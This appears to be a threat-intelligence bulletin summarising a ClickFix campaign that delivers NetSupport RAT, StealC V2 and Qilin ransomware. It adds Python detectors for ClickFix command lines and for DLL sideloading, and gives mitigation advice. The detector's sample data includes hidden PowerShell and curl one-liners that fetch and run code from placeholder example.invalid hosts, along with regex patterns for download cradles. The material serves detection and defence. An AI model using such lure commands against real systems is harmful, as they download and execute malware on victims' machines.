Current Cyber Threats

I Am Not a Robot: ClickFix Used to Deploy StealC and Qilin

Summary:
The ClickFix social engineering tactic has evolved into a primary delivery vector for high-impact cyberattacks, most recently documented in a campaign that ended in Qilin ransomware deployment. The attack begins when a user browses to a compromised but otherwise legitimate website, which loads an obfuscated JavaScript file that fingerprints the host. The script then presents a "human verification" or CAPTCHA-style lure instructing the user to perform a series of manual steps (copying a command and running it themselves), effectively turning the victim into an unwitting accomplice in their own infection. By following these prompts, the user executes a batch file that installs NetSupport Manager (frequently dubbed "NetSupport RAT"). Threat actors then use this legitimate remote access tool to establish a persistent foothold and exfiltrate data.
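The execution chain described above leaves a recognisable shape in endpoint telemetry: explorer.exe (the Win+R Run box) spawning an interpreter with a download cradle and a trailing CAPTCHA-style comment, and the pasted text lingering in the user's RunMRU registry key. The Python below is an added example, not code from the Sophos report. It scores constructed Sysmon-style process-creation records and a constructed RunMRU export against those traits; the field names, sample commands and example.invalid URLs are assumptions for illustration, not real telemetry.

```python
"""Flag ClickFix-style command execution in endpoint telemetry.

Added example, not code from the Sophos write-up. The records below are
constructed to resemble Sysmon Event ID 1 (process creation) and an export of
the user's RunMRU registry key; field names are assumptions, not a vendor schema.
"""
import ntpath
import re

# explorer.exe is the parent when a command is pasted into the Win+R Run box.
PASTE_PARENTS = {"explorer.exe"}
# Interpreters and tools that ClickFix one-liners hand the pasted text to.
CLICKFIX_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                     "wscript.exe", "cscript.exe", "curl.exe"}

# Command-line traits of the lure: a download cradle, in-memory execution, a
# hidden window, policy bypass, a base64 blob, and the trailing comment that
# makes the pasted text look like a verification string to the victim.
INDICATORS = {
    "download_cradle": re.compile(r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|"
                                  r"curl|wget|downloadstring|bitsadmin|certutil)\b", re.I),
    "inline_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I),
    "policy_bypass": re.compile(r"-e(p|xecutionpolicy)?\s+bypass\b", re.I),
    "encoded_command": re.compile(r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}", re.I),
    "captcha_comment": re.compile(r"#.*(not a robot|human|verif|captcha)", re.I),
}


def _name(path):
    return ntpath.basename(path).lower()


def assess_process(ev):
    """Return indicator hits and a verdict for one process-creation record."""
    cmd = ev.get("CommandLine", "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    paste_chain = (_name(ev.get("ParentImage", "")) in PASTE_PARENTS
                   and _name(ev.get("Image", "")) in CLICKFIX_CHILDREN)
    # Alert on an interpreter spawned from the Run box with any lure trait,
    # the CAPTCHA-style comment anywhere, or a dense cluster of traits.
    suspicious = (paste_chain and bool(hits)) or "captcha_comment" in hits or len(hits) >= 3
    return {"suspicious": suspicious, "paste_chain": paste_chain, "hits": hits}


def find_clickfix(events):
    """Indices and assessments of records that look like ClickFix executions."""
    return [(i, a) for i, ev in enumerate(events) if (a := assess_process(ev))["suspicious"]]


def suspicious_runmru(values):
    """Scan an exported RunMRU key (HKCU\\...\\Explorer\\RunMRU), most recent first.

    Each value holds '<command>\\1'; the MRUList value orders the value names.
    """
    findings = []
    for name in values.get("MRUList", ""):
        data = values.get(name, "")
        cmd = data[:-2] if data.endswith("\\1") else data
        hits = [n for n, rx in INDICATORS.items() if rx.search(cmd)]
        if hits:
            findings.append((name, cmd, hits))
    return findings


# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iwr http://example.invalid/v.txt | iex"'
                    ' # I am not a robot - reCAPTCHA Verification ID: 1234'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c curl -s http://example.invalid/r.bat -o %TEMP%\r.bat && %TEMP%\r.bat"},
    {"ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoProfile -File build.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\u\notes.txt"},
    {"ParentImage": r"C:\Windows\explorer.exe",       # benign Run-box use
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c ipconfig /all"},
]

SAMPLE_RUNMRU = {  # constructed export of HKCU\...\Explorer\RunMRU
    "MRUList": "cab",
    "a": "cmd\\1",
    "b": "notepad\\1",
    "c": 'powershell -w hidden -c "irm http://example.invalid/x | iex"'
         ' # I am not a robot - reCAPTCHA Verification ID: 9928\\1',
}

if __name__ == "__main__":
    for idx, verdict in find_clickfix(SAMPLE_EVENTS):
        print(f"event {idx}: paste_chain={verdict['paste_chain']} hits={verdict['hits']}")
    for name, cmd, hits in suspicious_runmru(SAMPLE_RUNMRU):
        print(f"RunMRU {name}: {hits} <- {cmd}")
```

The Run-box parent alone is not an alert condition (the benign `ipconfig` record passes), which keeps the rule usable on help-desk and developer machines; the lure traits, and especially the verification-string comment, carry the weight. The RunMRU scan is the forensic counterpart for hosts without process telemetry: the pasted command survives there after the window is closed.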

In this specific campaign, the NetSupport infection served as a staging ground for downloading StealC V2, an infostealer released in March 2025 with improved stealth and multi-monitor screen capture. The infostealer harvested privileged credentials from the victim's environment, which were subsequently used to gain unauthorized access to a Fortinet VPN device. Approximately one month after the initial infostealer compromise, Qilin affiliates (linked to the GOLD FEATHER threat group) used this access to move laterally and deploy ransomware across the network. The incident illustrates a growing pattern in which low-complexity social engineering is combined with credential-theft tooling to feed ransomware-as-a-service (RaaS) operations.


Security Officer Comments:
The ClickFix technique represents a significant shift in the threat landscape because it sidesteps browser-side protections such as Google Safe Browsing: the browser never downloads a file, so there is nothing for those controls to block. The user pastes and runs the command themselves via the Windows Run dialog (Win+R) or a PowerShell window. From an OSINT perspective, the rapid growth of this tactic, reportedly a 517% increase in detections between 2024 and 2025, suggests it has become a commoditized "initial access as a service" offering. The use of legitimate signed binaries such as client32.exe (NetSupport) and mfpmp.exe (the Windows Media Foundation protected pipeline process) for DLL sideloading further complicates detection, since the host executable carries a valid digital signature that satisfies basic endpoint checks. The signature on the host says nothing about the library it loads from the same directory, so detection should key on the signed binary running from a user-writable path and on the signer (or absence of one) of the DLL it loads.
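The sideloading point above is easier to operationalise than it sounds: a signed host binary outside its install directory, loading a DLL from its own folder that is unsigned or signed by someone other than the host's publisher, is the shape to hunt for. The Python below is an added example, not code from the Sophos report or any vendor; it applies that rule to constructed Sysmon-style image-load records. The host profiles (expected publisher strings and install directories for mfpmp.exe and client32.exe), the field names and the file paths are assumptions for illustration, and the rule generalises to hosts that are not in the profile table.

```python
"""Spot DLL sideloading by signed host binaries in image-load telemetry.

Added example, not from the Sophos write-up or any vendor. Records are
constructed to resemble Sysmon Event ID 7 (image loaded); the publisher
strings and install directories in HOST_PROFILES are assumptions.
"""
import ntpath

# Signed binaries known to be abused as sideload hosts, with the publisher
# expected on the host and the libraries it legitimately loads, and the
# directories where the genuine product lives. Illustrative values only.
HOST_PROFILES = {
    "mfpmp.exe": {"publisher": "Microsoft Windows",
                  "dirs": (r"c:\windows\system32", r"c:\windows\syswow64")},
    "client32.exe": {"publisher": "NetSupport Ltd",
                     "dirs": (r"c:\program files\netsupport",
                              r"c:\program files (x86)\netsupport")},
}

# Directories an interactive user can write to; a signed host loading a DLL
# from here is the classic sideload shape. No trailing backslashes.
USER_WRITABLE_DIRS = (r"c:\users", r"c:\programdata", r"c:\windows\temp")


def _under(path, dirs):
    """True if path equals one of dirs or lies beneath it (paths already lowercased)."""
    return any(path == d or path.startswith(d + "\\") for d in dirs)


def assess_image_load(ev):
    """Return a list of reasons an image-load record looks like sideloading (empty if clean)."""
    host = ev["Image"].lower()
    dll = ev["ImageLoaded"].lower()
    host_name, host_dir = ntpath.basename(host), ntpath.dirname(host)
    dll_dir = ntpath.dirname(dll)
    signed_ok = ev.get("SignatureStatus") == "Valid"
    signer = ev.get("Signature", "")
    reasons = []

    profile = HOST_PROFILES.get(host_name)
    # A known sideload host running anywhere but its product directory.
    if profile and not _under(host_dir, profile["dirs"]):
        reasons.append("host_outside_install_dir")

    # The DLL was resolved from the host's own directory (search-order abuse).
    if dll_dir == host_dir:
        if not signed_ok:
            reasons.append("unsigned_dll_beside_host")
        elif profile and signer != profile["publisher"]:
            reasons.append("dll_signer_differs_from_host")
        # Only escalate on location if something else is already wrong, so
        # per-user installs of signed software do not flood the queue.
        if reasons and _under(host_dir, USER_WRITABLE_DIRS):
            reasons.append("in_user_writable_dir")
    return reasons


def find_sideloads(events):
    """(index, reasons) for every record that trips at least one rule."""
    return [(i, r) for i, ev in enumerate(events) if (r := assess_image_load(ev))]


# Constructed sample records (not real telemetry).
SAMPLE_LOADS = [
    {"Image": r"C:\Users\u\AppData\Roaming\mf\mfpmp.exe",          # signed host dropped by the lure
     "ImageLoaded": r"C:\Users\u\AppData\Roaming\mf\mfplat.dll",
     "SignatureStatus": "Unavailable", "Signature": ""},
    {"Image": r"C:\Windows\System32\mfpmp.exe",                   # the genuine binary at home
     "ImageLoaded": r"C:\Windows\System32\mfplat.dll",
     "SignatureStatus": "Valid", "Signature": "Microsoft Windows"},
    {"Image": r"C:\ProgramData\NS\client32.exe",                  # NetSupport outside its install dir
     "ImageLoaded": r"C:\ProgramData\NS\pcicl32.dll",
     "SignatureStatus": "Valid", "Signature": "NetSupport Ltd"},
    {"Image": r"C:\Users\u\Downloads\tool\app.exe",               # unprofiled host, same pattern
     "ImageLoaded": r"C:\Users\u\Downloads\tool\version.dll",
     "SignatureStatus": "Unavailable", "Signature": ""},
    {"Image": r"C:\Program Files\Foo\foo.exe",                    # normal system DLL load
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
     "SignatureStatus": "Valid", "Signature": "Microsoft Windows"},
]

if __name__ == "__main__":
    for idx, reasons in find_sideloads(SAMPLE_LOADS):
        print(f"load {idx}: {', '.join(reasons)}")
```

The third record is the NetSupport case from this campaign: the binary and its libraries are genuinely signed, so the only signal is location. That is why the rule fires on "known host outside its install directory" on its own, while for unprofiled hosts it needs the unsigned-DLL condition before location matters.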

The transition from a StealC V2 infection to Qilin ransomware demonstrates the efficiency of the Initial Access Broker (IAB) ecosystem. The month-long dwell time between the infostealer deployment and the ransomware deployment points to a deliberate phase in which the stolen "logs" (the stealer's credential bundles) are processed and either sold on underground marketplaces such as Russian Market or handed directly to affiliates. Analysts should note that exposure of ports such as 3389 (RDP) and 5986 (WinRM over HTTPS) on C2 infrastructure is a common hallmark of these campaigns, used for hands-on-keyboard activity once a foothold is established.

Suggested Corrections:
CTU researchers recommend that organizations implement good cybersecurity hygiene to mitigate the threat from ransomware. These practices include patching vulnerable internet-facing devices and services in a timely manner, exposing potentially vulnerable services such as RDP to the internet only where there is a business need, and robustly implementing phishing-resistant multi-factor authentication (MFA) across the network, including on VPN and other remote access services of the kind abused in this campaign. Endpoint detection and response (EDR) solutions are also essential for identifying and mitigating precursor ransomware activity such as the ClickFix execution chain, NetSupport installation and infostealer activity described above.


Link(s):
https://www.sophos.com/en-us/blog/i-am-not-a-robot-clickfix-used-to-deploy-stealc-and-qilin